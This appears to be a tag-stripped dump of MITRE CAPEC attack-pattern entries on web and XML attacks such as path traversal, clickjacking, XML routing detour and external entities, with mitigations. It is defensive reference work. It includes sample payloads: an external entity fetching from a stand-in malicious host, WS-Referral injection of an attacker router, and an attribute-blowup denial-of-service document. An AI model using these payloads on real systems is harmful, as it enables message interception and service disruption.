An attacker utilizes web tools such as Mozilla's GreaseMonkey in order to modify the behavior of web applications, potentially violating assumptions that a server makes about web-based clients. Web-based client applications may use code such as JavaScript in order to populate fields submitted to a server or to ensure a correct order of operations. However, tools such as GreaseMonkey and Firebug can re-write a web site's JavaScript locally before it is interpreted on a client browser. As a result, the processing activities on the client may not conform to the server's expectations. For example, a web-based client application might use JavaScript to fill in the identity of the application's user based on other information that is available. However, if the attacker is utilizing a web tool to change the JavaScript of the web client, they could insert any identity that they wished, thus allowing them to impersonate other users. Depending on the client-functionality that the attacker is affecting, the attacker could impersonate other users, change purse-logic, remove client-based filters, and otherwise violate server expectations.
The server must rely on JavaScript, the DOM model, or some similar component of a web-based client application to perform trusted actions.
Medium
The attacker must have installed a web tool that allows scripts or the DOM model of web-based applications to be modified before they are executed in a browser. GreaseMonkey and Firebug are two examples of such tools. The attacker must also have some understanding of the script or DOM of the client application they are modifying and how these changes will affect the server.
1000
Attack Pattern
ChildOf
113
Wikipedia
Greasemonkey
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Greasemonkey
Firebug
http://getfirebug.com/
Mozilla Firefox Add-ons
Greasemonkey
https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary misuses the functionality of an application in order to achieve a negative technical impact.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker with access to file system resources, either directly or via application logic, will use various file path specification or navigation mechanisms such as ".." in path strings and absolute paths to extend their range of access to inappropriate areas of the file system. The attacker attempts to either explore the file system for recon purposes or access directories and files that are intended to be restricted from their access. Exploring the file system can be achieved through constructing paths presented to directory listing programs, such as "ls" and 'dir', or through specially crafted programs that attempt to explore the file system. The attacker engaging in this type of activity is searching for information that can be used later in a more exploitive attack. Access to restricted directories or files can be achieved through modification of path references utilized by system applications.
The target must leverage and access an underlying file system.
Low
Simple command line attacks.
Medium
Programming attacks.
The attacker must have access to an application interface or a direct shell that allows them to inject directory strings and monitor the results.
Design: Configure the access control correctly.
Design: Enforce principle of least privilege.
Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.
Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement.
Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.
Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.
Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin.
Implementation: Perform input validation for all remote content, including remote and user-generated content.
Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.
Implementation: Use indirect references rather than actual file names.
Implementation: Use possible permissions on file access when developing and deploying web applications.
Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- whitelisting approach.
Integrity
Confidentiality
Availability
Execute unauthorized code or commands
The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.
Integrity
Modify files or directories
The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.
Confidentiality
Read files or directories
The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.
Availability
DoS: crash / exit / restart
The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.
22
Targeted
893
Secondary
CVE-2012-2919
Directory traversal vulnerability in Upload/engine.php in Chevereto 1.9.1 allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in the v parameter..
CVE-2012-1917
compose.php in @Mail WebMail Client in AtMail Open-Source before 1.05 does not properly handle ../ (dot dot slash) sequences in the unique parameter, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a ..././ (dot dot dot slash dot slash) sequence.
1000
Category
ChildOf
210
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes any stack traces produced by error messages. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to cause the targeted application to return an error including a stack trace, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. The stack trace enumerates the chain of methods that led up to the point where the error was encountered. This can not only reveal the names of the methods (some of which may have known weaknesses) but possibly also the location of class files and libraries as well as parameter values. In some cases, the stack trace might even disclose sensitive configuration or user information.
The target application must fail to sanitize incoming messages adequately before processing and must generate a stack trace in at least some error situations.
Low
The attacker must have sufficient access to send messages to the target. The attacker must also have the ability to observe the stack trace produced by the target application. Fuzzing tools, which automatically generate and send message variants, are necessary for this attack.
209
Targeted
388
Targeted
CVE-2006-2434
Unspecified vulnerability in WebSphere 5.1.1 (or any earlier cumulative fix) Common Configuration Mode + CommonArchive and J2EE Models might allow attackers to obtain sensitive information via the trace.
1000
Attack Pattern
ChildOf
54
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application's log or error messages returned. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to observe the application's log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. By observing logs and error messages, the attacker can learn details about the configuration of the target application and might be able to cause the target to disclose sensitive information.
Probing
The attacker uses fuzzing tools to send random malformed messages to web server and observes for server's log or error message.
The attacker uses fuzzing tools to send random malformed messages to web server and observes for server's log or error message.
env-Web
The application's log or error messages contain sensitive information.
env-Web
There is no desired error message returned. This does not mean the application will not disclose sensitive information through error messages.
env-Web
The application log or error messages contain sensitive information about the application.
The web server may detect a large amount of HTTP requests from the same host in a short period.
Construct a 'code book' for error messages and /or clean the error messages.
Modify the parameters to get the desired information from the error messages.
Attacker usually needs to modify the fuzzing parameters according to the observed error messages to get the desired sensitive information for the application. To defeat correlation, the attacker may try changing the origin IP addresses or client browser identification strings or start a new session from where he left off in obfuscating the attack.
Modify the parameters in the fuzzing tool according to the observed error messages. Repeat with enough parameters until the application has been sufficiently mapped.
env-Web
If the application rejects the large amount of fuzzing messages from the same host machine, the attacker needs to hide the attacks by changing the IP addresses or other credentials.
env-Web
The application errors messages/logs contain sensitive information mapping the application.
env-Web
The application errors messages/logs have no sensitive information about the application.
env-Web
The attacker gets a list of sensitive information mapping the application.
The web server may detect a large amount of HTTP requests from the same host in a short period.
Construct a 'code book' for error messages and/or clean the error messages.
The target application must fail to sanitize incoming messages adequately before processing.
Low
High
Analysis
Injection
Brute Force
The following code generates an error message that leaks the full pathname of the configuration file.
Perl
$ConfigDir = "/home/myprog/config";
$uname = GetUserInput("username");
ExitError("Bad hacker!") if ($uname !~ /^\w+$/);
$file = "$ConfigDir/$uname.txt";
if (! (-e $file)) { ExitError("Error: $file does not exist"); }
...
If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application.
Medium
Although fuzzing parameters is not difficult, and often possible with automated fuzzing tools, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design.
Fuzzing tools, which automatically generate and send message variants, are necessary for this attack. The attacker must have sufficient access to send messages to the target. The attacker must also have the ability to observe the target application's log and/or error messages in order to collect information about the target.
Design: Construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are catalogued and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.
Design: wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion.
Implementation: Obfuscate server fields of HTTP response.
Implementation: Hide inner ordering of HTTP response header.
Implementation: Customizing HTTP error codes such as 404 or 500.
Implementation: Hide HTTP response header software information filed.
Implementation: Hide cookie's software information filed.
Implementation: Obfuscate database type in Database API's error message.
Confidentiality
"Varies by context"
Information Leakage
User-controllable request
Malformed message, based on application context, crafted to elicit error conditions from the application.
Error handling mechanism within the application.
The impact of activation is an error condition that reveals sufficient information for further application mapping to the attacker.
209
Targeted
532
Targeted
1000
Attack Pattern
ChildOf
54
http://capec.mitre.org/data/definitions/54.html
Exploitation
Medium
Low
Low
Client-Server
n-Tier
All
All
All
Common Weakness Enumeration (CWE)
CWE-209: Information Exposure Through an Error Message
Draft
The MITRE Corporation
http://cwe.mitre.org/data/definitions/209.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker may take advantage of a setting in communications protocols where security settings or other choices involving the various parameters can be influenced or manipulated to cause compromise to the communications. This can be disclosure of information, insertion or removal of information from the communications stream, and even include remote system compromise.
Access to the client/server stream.
The attacker needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time.
1000
Category
ChildOf
210
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker may take advantage of a setting in SSL that allows for weaknesses within that setting to be exploited to gain access to data intended to be encrypted, or injection commands or other traffic into the encrypted stream to cause compromise of either the client or server.
Determine the configuration levels of either the server or client being targeted, preferably both. This is not a hard requirement, as the attacker can simply assume commonly exploitable configuration settings and blindly attempt them.
Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one's self at a place on the network to intercept and control the flow of data between client and server, e.g. MITM (man in the middle).
Insert the malicious data into the stream that takes advantage of the configuration flaw.
Access to the client/server stream.
Low
Using MITM techniques, an attacker launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the attacker to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur.
High
The attacker needs real-time access to network traffic in such a manner that the attacker can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles.
The attacker needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time.
Assisted protocol analysis: because the protocol under attack is a public channel, or one in which the attacker likely has authorized access to, they need simply to decode the aspect of channel or message interpretation that codes for message identifiers.
Probing is as simple as changing this value and watching its effect.
Usage of configuration settings, such as stream ciphers vs. block ciphers and setting timeouts on SSL sessions to extremely low values lessens the potential impact. Use of later versions of TLS (e.g. TLS 1.1+) can also be effective, but not all clients or servers support the later versions.
Confidentiality
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
201
Targeted
CVE-2011-3389
1000
Attack Pattern
ChildOf
216
Complete Mediation
Penetration
High
High
Low
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker spoofs a UDDI, ebXML, or similar message in order to impersonate a service provider in an e-business transaction. UDDI, ebXML, and similar standards are used to identify businesses in e-business transactions. Among other things, they identify a particular participant, WSDL information for SOAP transactions, and supported communication protocols, including security protocols. By spoofing one of these messages an attacker could impersonate a legitimate business in a transaction or could manipulate the protocols used between a client and business. This could result in disclosure of sensitive information, loss of message integrity, or even financial fraud.
The targeted business's UDDI or ebXML information must be served from a location that the attacker can spoof or compromise or the attacker must be able to intercept and modify unsecured UDDI/ebXML messages in transit.
Medium
The attacker must be able to force the target user to accept their spoofed UDDI or ebXML message as opposed to the a message associated with a legitimate company. Depending on the follow-on for the attack, the attacker may also need to serve its own web services.
Implementation: Clients should only trust UDDI, ebXML, or similar messages that are verifiably signed by a trusted party.
345
Targeted
1000
Attack Pattern
ChildOf
148
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Man in the Middle type attacks. The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of his or her choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.
Survey the target
Using command line or an automated tool, an attacker records all instances of web services to process XML requests.
Use automated tool to record all instances to process XML requests or find exposed WSDL.
env-Web env-ClientServer
Use tools to crawl WSDL
env-Web env-ClientServer
The URL processes XML requests.
env-Web env-ClientServer
The application does not accept XML requests.
env-Web env-ClientServer
Identify SOAP messages that have multiple state processing.
Inspect instance to see whether the XML processing has multiple stages or not.
Inspect the SOAP message routing head to see whether the XML processing has multiple stages or not.
env-Web env-ClientServer
The SOAP message has multiple stage processing.
env-Web env-ClientServer
The SOAP message does not have intermediate nodes.
env-Web env-ClientServer
A list of URLs which have multiple stages to process XML contents.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Launch an XML routing detour attack
The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message identified in the Explore phase. Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents).
The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message
env-Web env-ClientServer
The XML message is routed to the attacker controlled node.
Use SSL for connections between all parties with mutual authentication.
The targeted system must have multiple stages processing of XML content.
Medium
High
Protocol Manipulation
Injection
Here is an example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (note: The client here is not necessarily a 'end user client' but rather the starting point of the XML transaction).
Example SOAP message with routing information in header:
<S:Envelope> <S:Header> <m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"> <m:action>http://example1.com/</m:action> <m:to>http://example4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope>
Add an additional node (example3.com/router) to the XML path in a WS-Referral message
<r:ref xmlns:r="http://schemas.example.com/referral"> <r:for> <r:prefix>http://example2.com/router</r:prefix> </r:for> <r:if/> <r:go> <r:via>http://example3.com/router</r:via> </r:go> </r:ref>
Resulting in the following SOAP Header:
<S:Envelope> <S:Header> <m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"> <m:action>http://example1.com/</m:action> <m:to>http://example4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> <m:via>http://example3.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body>
...
</S:Body> </S:Envelope>
In the following example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header but not access the message directly on the initiator/intermediary node that he/she has targeted.
Example of WS-Referral based WS-Routing injection of the bogus node route:
<r:ref xmlns:r="http://schemas.example.com/referral"> <r:for> <r:prefix>http://example2.com/router</r:prefix> </r:for> <r:if/> <r:go> <r:via>http://evilsite1.com/router</r:via> </r:go> </r:ref>
Resulting XML Routing Detour attack:
<S:Envelope> <S:Header> <m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"> <m:action>http://example_0.com/</m:action> <m:to>http://example_4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> <m:via>http://evilesite1.com/router</m:via> <m:via>http://example3.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope>
Thus, the attacker can route the XML message to the attacker controlled node (and access to the message contents).
Low
To inject a bogus node in the XML routing table
The attacker must be able to insert or compromise a system into the processing path for the transaction.
Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication.
Implementation: Use SSL for connections between all parties with mutual authentication.
Integrity
Modify application data
Confidentiality
Read application data
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
The routing table of the XML Header
The bogus routing node in the routing table of XML header
The route between the XML message sender and receiver.
Information Leakage
441
Targeted
610
Secondary
1000
Attack Pattern
ChildOf
94
http://capec.mitre.org/data/definitions/94.html
333
Category
ChildOf
377
http://capec.mitre.org/data/definitions/365.html
Exploitation
High
Medium
Low
Client-Server
All
All
WASC Threat Classification 2.0
WASC-32 - Routing Detour
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/w/page/13246956/Routing-Detour
Andre Yee
Threat Protection in a Service Oriented World
NFR Security
http://www.unatekconference.com/images/pdfs/presentations/Yee.pdf
Pete Lindstrom
Attacking & Defending Web Services
SPiRE Security
2002
http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client.
An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client.
There are numerous variations of this type of attack.
Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side.
High
High
Spoofing
Protocol Manipulation
Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.
Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.
Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.
Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on.
Medium
The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars
Ability to communicate synchronously or asynchronously with server
Design: Ensure that client process and/or message is authenticated so that anonymous communications and/or messages are not accepted by the system.
Design: Do not rely on client validation or encoding for security purposes.
Design: Utilize digital signatures to increase authentication assurance.
Design: Utilize two factor authentication to increase authentication assurance.
Implementation: Perform input validation for all remote content.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Read application data
290
Targeted
287
Targeted
20
Secondary
200
Secondary
693
Secondary
1000
Category
ChildOf
232
Penetration
High
High
Low
Client-Server
n-Tier
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary takes advantage of weaknesses in the protocol by which a client and server are communicating to perform unexpected actions. Communication protocols are necessary to transfer messages between client and server applications. Moreover, different protocols may be used for different types of interactions. For example, an authentication protocol might be used to establish the identities of the server and client while a separate messaging protocol might be used to exchange data. If there is a weakness in a protocol used by the client and server, an attacker might take advantage of this to perform various types of attacks. For example, if the attacker is able to manipulate an authentication protocol, the attacker may be able spoof other clients or servers. If the attacker is able to manipulate a messaging protocol, the may be able to read sensitive information or modify message contents. This attack is often made easier by the fact that many clients and servers support multiple protocols to perform similar roles. For example, a server might support several different authentication protocols in order to support a wide range of clients, including legacy clients. Some of the older protocols may have vulnerabilities that allow an attacker to manipulate client-server interactions.
The client and/or server must utilize a protocol that has a weakness allowing manipulation of the interaction.
Medium
The adversary must be able to identify the weakness in the utilized protocol and exploit it. This may require a sniffing tool as well as packet creation abilities. The adversary will be aided if they can force the client and/or server to utilize a specific protocol known to contain exploitable weaknesses.
757
Secondary
1000
Attack Pattern
ChildOf
272
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack takes advantage of the entity replacement property of XML where the value of the replacement is a URI. A well-crafted XML document could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.
A server that has an implementation that accepts entities containing URI values.
In this example, the XML parser parses the attacker's XML and opens the malicious URI where the attacker controls the server and writes a massive amount of data to the response stream. In this example the malicious URI is a large file transfer.
<?xml version="1.0"?>
< !DOCTYPE bomb [
<!ENTITY detonate SYSTEM "http://www.malicious-badguy.com/myhugefile.exe">
]>
<bomb>&detonate;</bomb>
This attack may be mitigated by tweaking the XML parser to not resolve external entities. If external entities are needed, then implement a custom XmlResolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.
1000
Attack Pattern
ChildOf
122
1000
Attack Pattern
ChildOf
278
333
Category
HasMember
376
CAPEC Content Team
The MITRE Corporation
2014-06-23
In an iFrame overlay attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system. While being logged in to some target system, the victim visits the attackers' malicious site which displays a UI that the victim wishes to interact with. In reality, the iFrame overlay page has a transparent layer above the visible UI with action controls that the attacker wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the attacker may have just tricked the victim into executing some potentially privileged (and most undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks he or she is clicking on versus what he or she is actually clicking on.
Craft an iFrame Overlay page
The attacker crafts a malicious iFrame overlay page.
The attacker leverages iFrame overlay capabilities to craft a malicious iFrame overlay page.
env-Web
Overlay capabilities are enabled in the browser.
env-Web
The target website implements protection against iFrame Overlay (frame busting).
env-Web
A page is created that performs unseen actions when the user interacts with the visible UI.
Disable overlay functionality in the browser. This can have obvious impact on the usability of the browser with some sites and web applications.
Implement frame busting protection in JavaScript in the application. The client-side code detects if a parent frame exist, if so, an iFrame overlay attack might be attempted.
Attacker tricks victim to load the iFrame overlay page
Attacker utilizes some form of temptation, misdirection or coercion to trick the victim to loading and interacting with the iFrame overlay page in a way that increases the chances that the victim will visit the malicious page.
Trick the victim to the malicious site by sending the victim an e-mail with a URL to the site.
env-Web
Trick the victim to the malicious site by manipulating URLs on a site trusted by the victim.
env-Web
Trick the victim to the malicious site through a cross-site scripting attack.
env-Web
The victim loads the iFrame overlay page.
Disable overlay functionality in the browser. This can have obvious impact on the usability of the browser with some sites and web applications.
Trick victim into interacting with the iFrame overlay page in the desired manner
The attacker tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege.
Hide action controls over very commonly used functionality.
env-Web
Hide action controls over very psychologically tempting content.
env-Web
The victim is communicating with the target application via a web based UI and not a thick client. The victim's browser security policies allow iFrames. The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser). The victim has an active session with the target system. The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system.
High
Medium
Spoofing
Social Engineering
The following example is a real-world iFrame overlay attack [2]. In this attack, the malicious page embeds Twitter.com on a transparent IFRAME. The status-message field is initialized with the URL of the malicious page itself. To provoke the click, which is necessary to publish the entry, the malicious page displays a button labeled "Don't Click." This button is aligned with the invisible "Update" button of Twitter. Once the user performs the click, the status message (i.e., a link to the malicious page itself) is posted to his/ her Twitter profile.
High
Crafting the proper malicious site and luring the victim to this site is not a trivial task.
No special resource required.
Configuration: Disable iFrames in the Web browser.
Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.
Operation: If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.
Integrity
Modify application data
Confidentiality
Read application data
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
1000
Attack Pattern
ChildOf
103
http://capec.mitre.org/data/definitions/103.html
Exploitation
High
High
Low
Client-Server
n-Tier
SOA
All
All
Michal Zalewski
Browser Security Handbook
Google Inc.
2008
http://code.google.com/p/browsersec/wiki/Main
M. Mahemoff
Explaining the "Don't Click" Clickjacking Tweetbomb
Software As She's Developed
February 12, 2009
http://softwareas.com/explaining-the-dont-click-clickjacking-tweetbomb
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary compares output from a target system to known "fingerprints" that uniquely identify specific details about the target. Fingerprinting by itself is not usually detrimental to the target. However, the information gathered through fingerprinting often enables an adversary to discover existing weaknesses in the target.
Very Low
208
Targeted
333
Category
HasMember
378
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server. For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.
The targeted application must use session credentials to identify legitimate users.
Medium
An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential.
CVE-2005-2252
PhpAuction 2.5 allows remote attackers to bypass authentication and gain privileges as another user by setting the PHPAUCTION_RM_ID cookie to the user ID.
1000
Attack Pattern
ChildOf
196
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource. The degree to which the attack is successful depends upon the adversary's ability to sustain resource requests over time with a volume that exceeds the normal usage by legitimate users, as well as other mitigating circumstances such as the target's ability to shift load or acquire additional resources to deal with the depletion. This attack differs from a flooding attack as it is not entirely dependent upon large volumes of requests, and it differs from resource leak exposures which tend to exploit the surrounding environment needed for the resource to function. The key factor in a sustainment attack are the repeated requests that take longer to process than usual.
This pattern of attack requires a temporal aspect to the servicing of a given request. Success can be achieved if the adversary can make requests that collectively take more time to complete than legitimate user requests within the same time frame.
To successfully execute this pattern of attack, a script or program is often required that is capable of continually engaging the target and maintaining sustained usage of a specific resource. Depending on the configuration of the target, it may or may not be necessary to involve a network or cluster of objects all capable of making parallel requests.
Potential mitigations include requiring a unique login for each resource request, constraining local unprivileged access by disallowing simultaneous engagements of the resource, or limiting access to the resource to one access per IP address. In such scenarios, the adversary would have to increase engagements either by launching multiple sessions manually or programmatically to counter such defenses.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker injects malicious content into an application's DTD in an attempt to produce a negative technical impact. DTDs are used to describe how XML documents are processed. Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion.
The target must be running an XML based application that leverages DTDs.
Medium
Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.
Implementation: Disallow the inclusion of DTDs as part of incoming messages.
100
Targeted
1000
Attack Pattern
ChildOf
250
1000
Attack Pattern
CanFollow
280
Ryan Naraine
DoS Flaw in SOAP DTD Parameter
InternetNews.com
ITBusiness Edge, Quinstreet Inc.
December 15, 2003
http://www.internetnews.com/dev-news/article.php/3289191
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack exploits certain XML parsers which manage data in an inefficient manner. The attacker crafts an XML document with many attributes in the same XML node. In a vulnerable parser, this results in a denial of service condition where CPU resources are exhausted because of the parsing algorithm.
The server accepts XML input and is using a parser with a runtime longer than O(n) for the insertion of a new attribute in the data container.(examples are .NET framework 1.0 and 1.1)
In this example, assume that the victim is running a vulnerable parser such as .NET framework 1.0. This results in a quadratic runtime of O(n^2).
<?xml version="1.0"?>
<foo
aaa=""
ZZZ=""
...
999=""
/>
A document with n attributes results in (n^2)/2 operations to be performed. If an operation takes 100 nanoseconds then a document with 100,000 operations would take 500s to process. In this fashion a small message of less than 1MB causes a denial of service condition on the CPU resources.
This attack may be mitigated completely by using a parser that is not using a vulnerable container. Mitigation may also limit the number of attributes per XML element.
770
Targeted
1000
Attack Pattern
ChildOf
231
333
Category
HasMember
374
